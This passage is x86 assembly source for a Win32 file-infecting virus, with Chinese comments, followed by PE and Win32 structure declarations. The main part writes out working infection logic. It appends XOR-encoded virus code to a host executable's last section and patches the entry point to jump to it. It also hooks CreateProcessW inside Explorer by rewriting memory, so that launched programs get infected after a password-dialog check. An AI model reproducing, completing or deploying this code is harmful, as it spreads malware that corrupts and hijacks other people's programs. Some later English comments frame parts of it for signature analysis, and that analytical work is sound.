;节感染后的大小对齐到 SectionAlignment
PUSH .INH_OptionalHeader.IOH_SectionAlignment
PUSH EAX
CALL _Align2Number
MOV .ISH_VirtualSize,EAX
;改变节属性 = 读写可执行
MOV .ISH_Characteristics,IMAGE_SCN_MEM_ALL
;计算 ImageSize = 最后一节的虚拟地址 + 最后一节的大小对齐到SectionAlignment
ADD EAX,.ISH_VirtualAddress
MOV DWORD PTR ,EAX
;解除内存映射
PUSH DWORD PTR
CALL ddUnmapViewOfFile
;关闭内存映射文件句柄
PUSH DWORD PTR
CALL ddCloseHandle
;计算感染后文件大小
MOV EAX,DWORD PTR
ADD EAX,DWORD PTR
;用感染后的文件大小重新生成内存映射文件
PUSH NULL
PUSH EAX
PUSH 0
PUSH PAGE_READWRITE
PUSH NULL
PUSH DWORD PTR
CALL ddCreateFileMappingA
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR ,EAX
;映射到内存指针
PUSH 0
PUSH 0
PUSH 0
PUSH File_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host
TEST EAX,EAX
JE _ErrorCloseFile
MOV DWORD PTR ,EAX
;取得IMAGE_NT_HEADERS
MOV ESI,DWORD PTR
CALL _GetNtHeader
TEST EAX,EAX
JE _ErrorCloseViewOfMap
;修正SizeOfImage
PUSH DWORD PTR
POP .INH_OptionalHeader.IOH_SizeOfImage
;计算程序入口地址在文件中的偏移
PUSH .INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH EAX
CALL _GetRawFromRVA
MOV DWORD PTR ,EAX
;将修正后的节复制到最后一节
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
MOV EDI,DWORD PTR
MOVZX EAX,.INH_FileHeader.IFH_NumberOfSections
DEC EAX
MUL ECX
PUSH ESI
ADD ESI,SIZE IMAGE_NT_HEADERS
ADD ESI,EAX
XCHG EDI,ESI
REP MOVSB
POP ESI
;计算病毒入口地址相对于原程序入口的偏移
MOV EAX,DWORD PTR
SUB EAX,.INH_OptionalHeader.IOH_AddressOfEntryPoint
SUB EAX,5
LEA EDI,@d
INC EDI
STOSD
;保存原程序入口的代码
MOV ESI,DWORD PTR
ADD ESI,DWORD PTR
LEA EDI,@f
PUSH SIZE_OF_EPC
POP ECX
PUSH ECX
PUSH ESI
REP MOVSB
POP ESI
POP ECX
;将新代码写入原程序入口
LEA EDI,@a
XCHG EDI,ESI
REP MOVSB
;将病毒代码写入文件
PUSH 65535
PUSH 313
PUSH 421
CALL _RandNumber
MOV dbDecodeKey,AL
MOV selfFlag,AH
LEA ESI,_CodeHead
MOV EDI,DWORD PTR
ADD EDI,DWORD PTR
PUSH SIZE_OF_CODE
POP ECX
PUSH EDI
REP MOVSB
POP EDI
PUSH EDI
ADD EDI,NEW_START_OFF
PUSH SIZE_OF_ENCODE
POP ECX
_SecondEncode:
XOR BYTE PTR ,AL
INC EDI
LOOP _SecondEncode
POP EDI
ADD EDI,SELF_KEY_OFF
PUSH SIZE_OF_STR
POP ECX
_StringEncode:
XOR BYTE PTR ,AH
INC EDI
LOOP _StringEncode
_ErrorCloseViewOfMap:
PUSH DWORD PTR
CALL ddUnmapViewOfFile
_ErrorCloseFileMap:
PUSH DWORD PTR
CALL ddCloseHandle
_ErrorCloseFile:
PUSH DWORD PTR
CALL ddCloseHandle
_ErrorSetAttributs:
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddSetFileAttributesA
_InfectExit:
MOV ESP,EBP
POP EBP
RET 4
_InfectExeFile ENDP
;***********************************************************************
_EntryPointCode:
@a: CALL $+5
@b: POP EAX
@c: PUSH EAX
@d: ADD EAX,0FFFFH
@e: JMP EAX
Align 4
@f: DB SIZE_OF_EPC DUP(0)
;***********************************************************************
;///////////////////////////////////////////////////////////////////////
;以下为内存对话框所需数据
;///////////////////////////////////////////////////////////////////////
check_okDB '密码正确,允许运行!',0
check_falseDB '密码错误,是否继续执行?继续的话将感染文件!',0
password DB '123456abcdef',0
buffer DB 20 DUP (0)
ALIGN 4
_TemplateBegin:
MemoryDialog DLGTEMPLATE<090c00080H,0,3,0,0,160,96>
DW 0
DW 0
_TemplateEnd:
dialogCaption DB '请输入执行密码',0
bt_OK DLGITEMTEMPLATE<050000001H,0,30,60,35,20,IDC_BUTTON_OK>
DW 0FFFFH
DW 00080H
OkCaption DB '确认',0
bt_Cancle DLGITEMTEMPLATE<050000001H,0,95,60,35,20,IDC_BUTTON_CANCEL>
DW 0FFFFH
DW 00080H
CancelCaption DB '取消',0
edit DLGITEMTEMPLATE<0500100A0H,000204H,30,20,100,12,IDC_EDIT_PASSWORD>
DW 0FFFFH
DW 00081H
editCaption DD 0
ALIGN 4
;///////////////////////////////////////////////////////////////////////
;以下为生成内存对话框代码
;///////////////////////////////////////////////////////////////////////
DialogWithoutRes PROC
PUSH EBX
PUSH ECX
PUSH EDI
CALL _DWR_Delta
_DWR_Delta:
POP EBX
SUB EBX,OFFSET _DWR_Delta
LEA EDI,DialogTemplate
PUSH 512
POP ECX
XOR EAX,EAX
REP STOSB
PUSH 1
PUSH OFFSET DialogTemplate
ADD DWORD PTR ,EBX
PUSH OFFSET MemoryDialog
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET bt_OK
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET bt_Cancle
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH EAX
PUSH OFFSET edit
ADD DWORD PTR ,EBX
CALL InitializeTemplate
TEST EAX,EAX
JE _DWR_Return
PUSH 0
PUSH OFFSET DlgProc
ADD DWORD PTR ,EBX
PUSH NULL
PUSH OFFSET DialogTemplate
ADD DWORD PTR ,EBX
PUSH NULL
CALL ddDialogBoxIndirectParamA
_DWR_Return:
POP EDI
POP ECX
POP EBX
RET
DialogWithoutRes ENDP
;**************************************************************************************
;InitializeTemplate stdcall,srcTemplate:DWORD,dstTemplate:DWORD,flagDialogOrItem:DWORD
;PUSH flagDialogOrItem
;PUSH dstTemplate
;PUSH srcTemplate
;PUSH return_address
;CALL InitializeTemplate
;PUSH EBP
;**************************************************************************************
InitializeTemplate PROC
PUSH EBP
MOV EBP,ESP
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _IT_Delta
_IT_Delta:
POP EBX
SUB EBX,OFFSET _IT_Delta
MOV ESI,DWORD PTR
MOV EDI,DWORD PTR
MOV ECX,SIZE_OF_TEMPLATE
CLD
REP MOVSB
PUSH 032H
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddMultiByteToWideChar
TEST EAX,EAX
JE _IT_return
PUSH EAX
XOR ECX,ECX
INC ECX
INC ECX
DIV CL
SHR EAX,8
XCHG EAX,ECX
XOR ECX,DWORD PTR
POP EAX
ADD EAX,ECX
SHL EAX,1
ADD EAX,EDI
ADD EAX,3
SHR EAX,2
SHL EAX,2
_IT_return:
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 12
InitializeTemplate ENDP
;CenterDialog PROC stdcall,HWND:DWORD
;PUSH HWND
;PUSH return_address
;CALL CenterDialog
;PUSH EBP
;RECT of desktop window left,top,right,bottom
;RECT of this window
CenterDialog PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,32
PUSH EBX
CALL _CD_Delta
_CD_Delta:
POP EBX
SUB EBX,OFFSET _CD_Delta
PUSH EBP
SUB DWORD PTR ,32
PUSH DWORD PTR
CALL ddGetWindowRect
CALL ddGetDesktopWindow
PUSH EBP
SUB DWORD PTR ,16
PUSH EAX
CALL ddGetWindowRect
PUSH 1
PUSH DWORD PTR
PUSH DWORD PTR
MOV EAX,DWORD PTR
SUB EAX,DWORD PTR
SHR EAX,1
PUSH EAX
MOV EAX,DWORD PTR
SUB EAX,DWORD PTR
SHR EAX,1
PUSH EAX
PUSH DWORD PTR
CALL ddMoveWindow
POP EBX
ADD ESP,36
MOV ESP,EBP
POP EBP
RET
CenterDialog ENDP
;DlgProc STDCALL,hwnd_:DWORD,wmsg:DWORD,wparam_:DWORD,lparam_:DWORD
;PUSH lparam_
;PUSH wparam_
;PUSH msg_
;PUSH hwnd_
;PUSH return_address
;CALL dlgProc
;PUSH EBP
DlgProc PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH 0
POP DWORD PTR
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _DP_Delta
_DP_Delta:
POP EBX
SUB EBX,OFFSET _DP_Delta
CMP DWORD PTR , WM_DESTROY
JE msg_DESTORY
CMP DWORD PTR , WM_CLOSE
JE msg_DESTORY
CMP DWORD PTR , WM_COMMAND
JE msg_COMMAND
CMP DWORD PTR , WM_INITDIALOG
JE msg_INITDIALOG
XOR EAX,EAX
JMP _DP_Return
msg_INITDIALOG:
PUSH DWORD PTR
CALL CenterDialog
JMP _DP_Return
msg_DESTORY:
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddEndDialog
JMP _DP_Return
msg_COMMAND:
CMP WORD PTR ,IDC_BUTTON_OK
JE Check_PWD
CMP WORD PTR , IDC_BUTTON_CANCEL
JE msg_DESTORY
JMP _DP_Return
Check_PWD:
PUSH 19
PUSH OFFSET buffer
ADD DWORD PTR ,EBX
PUSH IDC_EDIT_PASSWORD
PUSH DWORD PTR
CALL ddGetDlgItemTextA
CMP EAX,12
JNE Input_Error
PUSH EAX
POP ECX
MOV ESI,OFFSET buffer
ADD ESI,EBX
MOV EDI,OFFSET password
ADD EDI,EBX
CLD
REPE CMPSB
JCXZ Input_OK
JMP Input_Error
Input_OK:
PUSH MB_OK
PUSH NULL
PUSH OFFSET check_ok
ADD DWORD PTR ,EBX
PUSH DWORD PTR
CALL ddMessageBoxA
PUSH 1
POP DWORD PTR
JMP msg_Destory
Input_Error:
PUSH MB_YESNO
PUSH NULL
PUSH OFFSET check_false
ADD DWORD PTR ,EBX
PUSH DWORD PTR
CALL ddMessageBoxA
CMP EAX,6
JNE _DP_Return
PUSH 2
POP DWORD PTR
JMP msg_Destory
_DP_Return:
POP EDI
POP ESI
POP ECX
POP EBX
ADD ESP,4
MOV ESP,EBP
POP EBP
RET 16
DlgProc ENDP
_CreateProcessW_Hook PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,01000H
PUSH EBX
PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI
CALL _CPWDelta
_CPWDelta:
POP EBX
SUB EBX,OFFSET _CPWDelta
MOV EAX,DWORD PTR
TEST EAX,EAX
JNZ _GetParamI
_GetParamII:
MOV EAX,DWORD PTR
TEST EAX,EAX
JZ _CPWExit
_GetParamI:
MOV ESI,EAX
MOV EDI,EBP
SUB EDI,MAX_PATH
;将Unicode字符转化为 ASCII 字符
PUSH NULL
PUSH NULL
PUSH MAX_PATH
PUSH EDI
PUSH -1
PUSH ESI
PUSH 0
PUSH 0
CALL ddWideCharToMultiByte
TEST EAX,EAX
JE _CPWExit
PUSH EDI
SUB EDI,MAX_PATH
PUSH EDI
CALL _GetExeFileName
CALL DialogWithOutRes
XCHG EAX,ECX
JCXZ _CPWExit
DEC ECX
JCXZ _ProcessNormal
PUSH EDI
CALL _InfectExeFile
_ProcessNormal:
CALL _CPW_OldCodeStore
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
PUSH DWORD PTR
CALL ddCreateProcessW
_CPWExit:
CALL _CPW_NewCodeStore
POP EDI
POP ESI
POP EDX
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 40
_CreateProcessW_Hook ENDP
;***********************************************************************
_PeekMessageW_Hook:
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
CALL _PeekMessageWDelta
_PeekMessageWDelta:
POP EBX
SUB EBX,OFFSET _PeekMessageWDelta
;查看内存映射文件是否已经打开
;若已打开则直接跳出
PUSH ddMapFileHandle_Host
POP EAX
TEST EAX,EAX
JNE _IsNotFirstIn
;打开内存映射文件
_PushAddress szMapFileName_Host
PUSH 0
PUSH FILE_MAP_WRITE
CALL ddOpenFileMappingA_Host
;打开失败则退出
TEST EAX,EAX
JE _IsNotFirstIn
MOV ddMapFileHandle_Host,EAX
;映射地址空间
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host
TEST EAX,EAX
JE _IsNotFirstIn
MOV ddViewOfMap_Host,EAX
MOV EDI,EAX
;将CreateProcessW的挂接函数地址写入挂接代码
;写入内存映射文件中
ADD EAX,CPW_HOOK_OFF
ADD EDI,CPW_CODE_OFF
INC EDI
STOSD
;写入PeekMessage Hook中
LEA EDI,CPW_NewCode
INC EDI
STOSD
;更改CreateProcessW所在页面的保护属性
MOV EAX,ddCreateProcessW_Host
AND EAX,0FFFFF000H
PUSH EBP
SUB DWORD PTR ,4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
CALL ddVirtualProtect_Host
TEST EAX,EAX
JE _IsNotFirstIn
;打开 event 对象
_PushAddress szEventName
PUSH 0
PUSH EVENT_MODIFY_STATE
CALL ddOpenEventA_Host
TEST EAX,EAX
JE _IsNotFirstIn
PUSH EAX
;将挂接代码写入CreateProcessW
CALL _CPW_NewCodeStore
;将Event对象设置为有信号
CALL ddSetEvent_Host
_IsNotFirstIn:
MOV EAX,EBX
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
PUSH DWORD PTR ddPeekMessageW_Host
POP EAX
JMP EAX
_CPW_NewCodeStore PROC
PUSH 7
POP ECX
MOV EDI,ddCreateProcessW_Host
LEA ESI,CPW_NewCode
REP MOVSB
RET
_CPW_NewCodeStore ENDP
szMapFileName_Host DB "LongliveChairmanMao",0
szEventName DB "TheThoughtOfChiremanMaoAlwaysShines",0
ALIGN 4
ddMapFileHandle_Host DD 0
ddViewOfMap_Host DD 0
ddMapViewOfFile_Host DD 0
ddCreateProcessW_Host DD 0
ddOpenFileMappingA_Host DD 0
ddVirtualProtect_Host DD 0
ddOpenEventA_Host DD 0
ddSetEvent_Host DD 0
ddMessageBoxA_Host DD 0
ddPeekMessageW_Host DD 0
CPW_OldCode DB 8 DUP(0)
CPW_NewCode DB 0B8H,0,0,0,0,0FFH,0E0H,0
_PeekMessageW_HookTail:
; Name table of imported APIs, presumably resolved by name at runtime
; (the matching dd* address slots follow _CodeTail). The list itself is
; a useful static signature: process/module enumeration, remote memory
; access and file-mapping/event names all appear together.
szTestFile DB "E:\Notepad.exe",0          ; author's test target path
szLoadLibraryA DB "LoadLibraryA",0
szCreateToolhelp32Snapshot DB "CreateToolhelp32Snapshot",0
szProcess32First DB "Process32First",0
szProcess32Next DB "Process32Next",0
szModule32First DB "Module32First",0
szModule32Next DB "Module32Next",0
szOpenProcess DB "OpenProcess",0
szUnmapViewOfFile DB "UnmapViewOfFile",0
szCloseHandle DB "CloseHandle",0
szGetFileAttributesA DB "GetFileAttributesA",0
szSetFileAttributesA DB "SetFileAttributesA",0
szCreateFileA DB "CreateFileA",0
szGetFileSize DB "GetFileSize",0
szGetTickCount DB "GetTickCount",0
szWriteProcessMemory DB "WriteProcessMemory",0
szReadProcessMemory DB "ReadProcessMemory",0
szVirtualProtectEx DB "VirtualProtectEx",0
szWideCharToMultiByte DB "WideCharToMultiByte",0
szMultiByteToWideChar DB "MultiByteToWideChar",0
szCreateEventA DB "CreateEventA",0
szWaitForSigleObject DB "WaitForSingleObject",0   ; label misspelled ("Sigle"); the string is correct
szCreateProcessW DB "CreateProcessW",0
szOpenFileMappingA DB "OpenFileMappingA",0
szVirtualProtect DB "VirtualProtect",0
szOpenEventA DB "OpenEventA",0
szSetEvent DB "SetEvent",0,0
szUser32 DB "USER32.DLL",0                ; module name for the user32 entries below
szMessageBoxA DB "MessageBoxA",0
szPeekMessageW DB "PeekMessageW",0
szGetDesktopWindow DB "GetDesktopWindow",0
szDialogBoxIndirectParamA DB "DialogBoxIndirectParamA",0
szGetDlgItemTextA DB "GetDlgItemTextA",0
szGetWindowRect DB "GetWindowRect",0
szMoveWindow DB "MoveWindow",0
szEndDialog DB "EndDialog",0,0
szExplorer DB "EXPLORER.EXE",0            ; target process name
ALIGN 4
_CodeTail:                                ; end of the relocatable code/data region
; Uninitialised storage placed after _CodeTail, i.e. outside the
; _CodeHead.._CodeTail region. One DD slot per entry of the name table
; above; how and where they are filled is not visible here.
ddExplorerHandle DD ?
ddExplorerModule DD ?
ddCreateFileMappingA DD ?
ddGetProcAddress DD ?
ddLoadLibraryA DD ?
ddCreateToolhelp32Snapshot DD ?
ddProcess32First DD ?
ddProcess32Next DD ?
ddModule32First DD ?
ddModule32Next DD ?
ddOpenProcess DD ?
ddUnmapViewOfFile DD ?
ddCloseHandle DD ?
ddGetFileAttributesA DD ?
ddSetFileAttributesA DD ?
ddCreateFileA DD ?
ddGetFileSize DD ?
ddGetTickCount DD ?
ddWriteProcessMemory DD ?
ddReadProcessMemory DD ?
ddVirtualProtectEx DD ?
ddWideCharToMultiByte DD ?
ddMultiByteToWideChar DD ?
ddCreateEventA DD ?
ddWaitForSingleObject DD ?
ddCreateProcessW DD ?
ddOpenFileMappingA DD ?
ddVirtualProtect DD ?
ddOpenEventA DD ?
ddSetEvent DD ?
ddMessageBoxA DD ?
ddPeekMessageW DD ?
ddGetDesktopWindow DD ?
ddDialogBoxIndirectParamA DD ?
ddGetDlgItemTextA DD ?
ddGetWindowRect DD ?
ddMoveWindow DD ?
ddEndDialog DD ?
ALIGN 4
ddGlobalBuffer DD ?
ALIGN 4
DialogTemplate DD ?             ; pointer slot; the template itself is not in this view
END _Main
; ---- Virus.inc: Win32 structure and constant declarations ----
; x86 CONTEXT (winnt.h). C_Float stands in for the 112-byte
; FLOATING_SAVE_AREA; field order follows the SDK layout.
CONTEXT STRUC
C_ContextFlags DD ?
C_Dr0 DD ?
C_Dr1 DD ?
C_Dr2 DD ?
C_Dr3 DD ?
C_Dr6 DD ?
C_Dr7 DD ?
C_Float DB 70H DUP(?)           ; FLOATING_SAVE_AREA, 70H = 112 bytes
C_SegGs DD ?
C_SegFs DD ?
C_SegEs DD ?
C_SegDs DD ?
C_Edi DD ?
C_Esi DD ?
C_Ebx DD ?
C_Edx DD ?
C_Ecx DD ?
C_Eax DD ?
C_Ebp DD ?
C_Eip DD ?
C_SegCs DD ?
C_EFlags DD ?
C_Esp DD ?
C_SegSs DD ?
CONTEXT ENDS
; EXCEPTION_POINTERS (winnt.h): the two pointers handed to an exception filter.
EXCEPTION_POINTERS STRUC
ExceptionRecord DD ?            ; -> EXCEPTION_RECORD
ContextRecord DD ?              ; -> CONTEXT
EXCEPTION_POINTERS ENDS
; EXCEPTION_RECORD (winnt.h). 0FH = EXCEPTION_MAXIMUM_PARAMETERS (15).
EXCEPTION_RECORD STRUC
ExceptionCode DD ?
ExceptionFlags DD ?
LPExceptionRecord DD ?          ; nested record pointer
ExceptionAddress DD ?
NumberParameters DD ?
ExceptionInformation DD 0FH DUP(?)
EXCEPTION_RECORD ENDS
; IMAGE_DOS_HEADER (winnt.h). IDH_lfanew holds the file offset of the
; PE signature / IMAGE_NT_HEADERS.
IMAGE_DOS_HEADER STRUC
IDH_magic DW ?                  ; expected DOS_SIGN ('MZ')
IDH_cblp DW ?
IDH_cp DW ?
IDH_crlc DW ?
IDH_cparhdr DW ?
IDH_minalloc DW ?
IDH_maxalloc DW ?
IDH_ss DW ?
IDH_sp DW ?
IDH_csum DW ?
IDH_ip DW ?
IDH_cs DW ?
IDH_lfarlc DW ?
IDH_ovno DW ?
IDH_res DW 4 DUP(?)
IDH_oemid DW ?
IDH_oeminfo DW ?
IDH_res2 DW 10 DUP(?)
IDH_lfanew DD ?                 ; offset of the NT headers
IMAGE_DOS_HEADER ENDS
DOS_SIGN = 05A4DH               ; 'MZ' read as a little-endian word
; IMAGE_DATA_DIRECTORY (winnt.h): one RVA/size pair of the optional header's directory table.
IMAGE_DATA_DIRECTORY STRUC
IDD_VirtualAddress DD ?
IDD_Size DD ?
IMAGE_DATA_DIRECTORY ENDS
; IMAGE_FILE_HEADER (winnt.h): COFF header that follows the PE signature.
IMAGE_FILE_HEADER STRUC
IFH_Machine DW ?
IFH_NumberOfSections DW ?
IFH_TimeDateStamp DD ?
IFH_PointerToSymbolTable DD ?
IFH_NumberOfSymbols DD ?
IFH_SizeOfOptionalHeader DW ?
IFH_Characteristics DW ?
IMAGE_FILE_HEADER ENDS
; IMAGE_OPTIONAL_HEADER, 32-bit (PE32) variant from winnt.h.
; IOH_DataDirectory has IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 10H entries.
IMAGE_OPTIONAL_HEADER STRUC
IOH_Magic DW ?
IOH_MajorLinkerVersion DB ?
IOH_MinorLinkerVersion DB ?
IOH_SizeOfCode DD ?
IOH_SizeOfInitializedData DD ?
IOH_SizeOfUninitializedData DD ?
IOH_AddressOfEntryPoint DD ?    ; RVA of the entry point
IOH_BaseOfCode DD ?
IOH_BaseOfData DD ?
IOH_ImageBase DD ?
IOH_SectionAlignment DD ?
IOH_FileAlignment DD ?
IOH_MajorOperatingSystemVersion DW ?
IOH_MinorOperatingSystemVersion DW ?
IOH_MajorImageVersion DW ?
IOH_MinorImageVersion DW ?
IOH_MajorSubsystemVersion DW ?
IOH_MinorSubsystemVersion DW ?
IOH_Win32VersionValue DD ?
IOH_SizeOfImage DD ?
IOH_SizeOfHeaders DD ?
IOH_CheckSum DD ?
IOH_Subsystem DW ?
IOH_DllCharacteristics DW ?
IOH_SizeOfStackReserve DD ?
IOH_SizeOfStackCommit DD ?
IOH_SizeOfHeapReserve DD ?
IOH_SizeOfHeapCommit DD ?
IOH_LoaderFlags DD ?
IOH_NumberOfRvaAndSizes DD ?
IOH_DataDirectory IMAGE_DATA_DIRECTORY 10H DUP(?)
IMAGE_OPTIONAL_HEADER ENDS
; IMAGE_NT_HEADERS32 (winnt.h): PE signature + file header + optional header.
IMAGE_NT_HEADERS STRUC
INH_Signature DD ?              ; expected NT_SIGN ('PE\0\0')
INH_FileHeader IMAGE_FILE_HEADER ?
INH_OptionalHeader IMAGE_OPTIONAL_HEADER ?
IMAGE_NT_HEADERS ENDS
NT_SIGN = 04550H                ; 'PE' read as a little-endian word (low half of 'PE\0\0')
; IMAGE_SECTION_HEADER (winnt.h); the section table follows the optional header.
IMAGE_SECTION_HEADER STRUC
ISH_Name DB 8 DUP (?)           ; IMAGE_SIZEOF_SHORT_NAME, not NUL-terminated
ISH_VirtualSize DD ?
ISH_VirtualAddress DD ?
ISH_SizeOfRawData DD ?
ISH_PointerToRawData DD ?
ISH_PointerToRelocations DD ?
ISH_PointerToLinenumbers DD ?
ISH_NumberOfRelocations DW ?
ISH_NumberOfLinenumbers DW ?
ISH_Characteristics DD ?        ; IMAGE_SCN_* flags
IMAGE_SECTION_HEADER ENDS
; IMAGE_IMPORT_DESCRIPTOR (winnt.h): one entry per imported DLL.
IMAGE_IMPORT_DESCRIPTOR STRUC
IID_Characteristics DD ?        ; a.k.a. OriginalFirstThunk (RVA of the INT)
IID_TimeDateStamp DD ?
IID_ForwarderChain DD ?
IID_Name DD ?                   ; RVA of the DLL name
IID_FirstThunk DD ?             ; RVA of the IAT
IMAGE_IMPORT_DESCRIPTOR ENDS
; IMAGE_THUNK_DATA32 (winnt.h): a single IAT/INT slot; only the union's
; Function member is named here.
IMAGE_THUNK_DATA32 STRUC
ITD_Function DD ?
IMAGE_THUNK_DATA32 ENDS
; IMAGE_EXPORT_DIRECTORY (winnt.h): header of a module's export table.
IMAGE_EXPORT_DIRECTORY STRUC
IED_Characteristics DD ?
IED_TimeDateStamp DD ?
IED_MajorVersion DW ?
IED_MinorVersion DW ?
IED_Name DD ?
IED_Base DD ?                   ; ordinal base
IED_NumberOfFunctions DD ?
IED_NumberOfNames DD ?
IED_AddressOfFunctions DD ?     ; RVA of the EAT
IED_AddressOfNames DD ?         ; RVA of the name-pointer table
IED_AddressOfNameOrdinals DD ?  ; RVA of the ordinal table (WORDs)
IMAGE_EXPORT_DIRECTORY ENDS
; FILETIME (minwinbase.h): 64-bit count of 100 ns intervals, split into two DWORDs.
FILE_TIME STRUC
FT_LowDateTime DD ?
FT_HighDateTime DD ?
FILE_TIME ENDS
MAX_MODULE_NAME32 = 256         ; tlhelp32.h (note: the SDK adds +1 when sizing szModule)
MAX_PATH = 260                  ; windef.h
; WIN32_FIND_DATAA (minwinbase.h) as filled by FindFirstFile/FindNextFile.
WIN32_FIND_DATA STRUC
WFD_FileAttributes DD ?
WFD_CreationTime FILE_TIME ?
WFD_LastAccessTime FILE_TIME ?
WFD_LastWriteTime FILE_TIME ?
WFD_FileSizeHigh DD ?
WFD_FileSizeLow DD ?
WFD_Reserved0 DD ?
WFD_Reserved1 DD ?
WFD_FileName DB MAX_PATH DUP(?)
WFD_AlternateFileName DB 14 DUP(?)   ; 8.3 short name
WIN32_FIND_DATA ENDS
; PROCESSENTRY32 (tlhelp32.h), used with Process32First/Process32Next.
; PE_dwSize must be set to the structure size before the call.
PROCESS_ENTRY32 STRUC
PE_dwSize DD ?
PE_cntUsage DD ?
PE_th32ProcessID DD ?
PE_th32DefaultHeapID DD ?
PE_th32ModuleID DD ?
PE_cntThreads DD ?
PE_th32ParentProcessID DD ?
PE_pcPriClassBase DD ?
PE_dwFlags DD ?
PE_szExeFile DB MAX_PATH DUP(?) ; image file name, compared against szExplorer elsewhere (not in this view)
PROCESS_ENTRY32 ENDS
; MODULEENTRY32 (tlhelp32.h), used with Module32First/Module32Next.
; ME_dwSize must be set to the structure size before the call.
MODULE_ENTRY32 STRUC
ME_dwSize DD ?
ME_th32ModuleID DD ?
ME_th32ProcessID DD ?
ME_GlblcntUsage DD ?
ME_ProccntUsage DD ?
ME_modBaseAddr DD ?             ; module base in the target process
ME_modBaseSize DD ?
ME_hModule DD ?
ME_szModule DB MAX_MODULE_NAME32 DUP(?)
ME_szExePath DB MAX_PATH DUP(?)
MODULE_ENTRY32 ENDS
; OSVERSIONINFOA (winnt.h) for GetVersionEx; dwOSVersionInfoSize is set by the caller.
OS_VERSION_INFO STRUC
OVI_dwOSVersionInfoSize DD ?
OVI_dwMajorVersion DD ?
OVI_dwMinorVersion DD ?
OVI_dwBuildNumber DD ?
OVI_dwPlatformId DD ?           ; one of the VER_PLATFORM_* values below
OVI_szCSDVersion DB 128 DUP(?)
OS_VERSION_INFO ENDS
; DLGTEMPLATE (winuser.h): header of an in-memory dialog template for
; DialogBoxIndirectParam. Item templates follow, DWORD-aligned.
DLGTEMPLATE STRUC
DT_style DD ?
DT_ExtendedStyle DD ?
DT_cdit DW ?                    ; number of DLGITEMTEMPLATEs that follow
DT_x DW ?
DT_y DW ?
DT_cx DW ?
DT_cy DW ?
DLGTEMPLATE ENDS
; DLGITEMTEMPLATE (winuser.h): one control inside a DLGTEMPLATE.
DLGITEMTEMPLATE STRUC
DIT_style DD ?
DIT_ExtendedStyle DD ?
DIT_x DW ?
DIT_y DW ?
DIT_cx DW ?
DIT_cy DW ?
DIT_id DW ?                     ; control id (e.g. IDC_* values defined in the main file)
DLGITEMTEMPLATE ENDS
; Win32 constants. Values below match the SDK headers (winnt.h, winbase.h,
; tlhelp32.h, winuser.h, memoryapi.h); IMAGE_SCN_MEM_ALL and
; PROCESS_OPEN_ACCESS are this file's own composites, not SDK names.
FILE_ATTRIBUTE_ARCHIVE = 20H
FILE_ATTRIBUTE_NORMAL = 80H
FILE_ATTRIBUTE_DIRECTORY = 10H
GENERIC_READ = 80000000H
GENERIC_WRITE = 40000000H
GENERIC_EXECUTE = 20000000H
GENERIC_ALL = 10000000H
; CreateFile disposition values
CREATE_NEW = 1
CREATE_ALWAYS = 2
OPEN_EXISTING = 3
OPEN_ALWAYS = 4
INVALID_HANDLE_VALUE = 0FFFFFFFFH
NULL = 0
PAGE_SIZE = 1000H               ; 4 KiB x86 page; used for page-aligning addresses
; Memory protection flags (decimal and hex mixed, as written by the author)
PAGE_NOACCESS = 1
PAGE_READONLY = 2
PAGE_READWRITE = 4
PAGE_WRITECOPY = 8
PAGE_EXECUTE = 16               ; = 10H
PAGE_EXECUTE_READWRITE = 40H
MEM_COMMIT = 1000H
MEM_RESERVE = 2000H
MEM_DECOMMIT = 4000H
MEM_RELEASE = 8000H
; MapViewOfFile access flags
FILE_MAP_COPY = 1
FILE_MAP_WRITE = 2
FILE_MAP_READ = 4
FILE_MAP_ALL_ACCESS = 0F001FH   ; SECTION_ALL_ACCESS
; Section characteristics
IMAGE_SCN_CNT_CODE = 20H
IMAGE_SCN_CNT_INITIALIZED_DATA = 40H
IMAGE_SCN_MEM_SHARED = 10000000H
IMAGE_SCN_MEM_EXECUTE = 20000000H
IMAGE_SCN_MEM_READ = 40000000H
IMAGE_SCN_MEM_WRITE = 80000000H
IMAGE_SCN_MEM_ALL = 0C0000060H  ; composite: MEM_READ|MEM_WRITE|CNT_CODE|CNT_INITIALIZED_DATA (no MEM_EXECUTE bit)
; CreateToolhelp32Snapshot flags
TH32CS_SNAPHEAPLIST = 1
TH32CS_SNAPPROCESS = 2
TH32CS_SNAPTHREAD = 4
TH32CS_SNAPMODULE = 8
TH32CS_SNAPALL = 0FH
TH32CS_INHERIT = 80000000H
VER_PLATFORM_WIN32s = 0
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2
; OpenProcess access rights
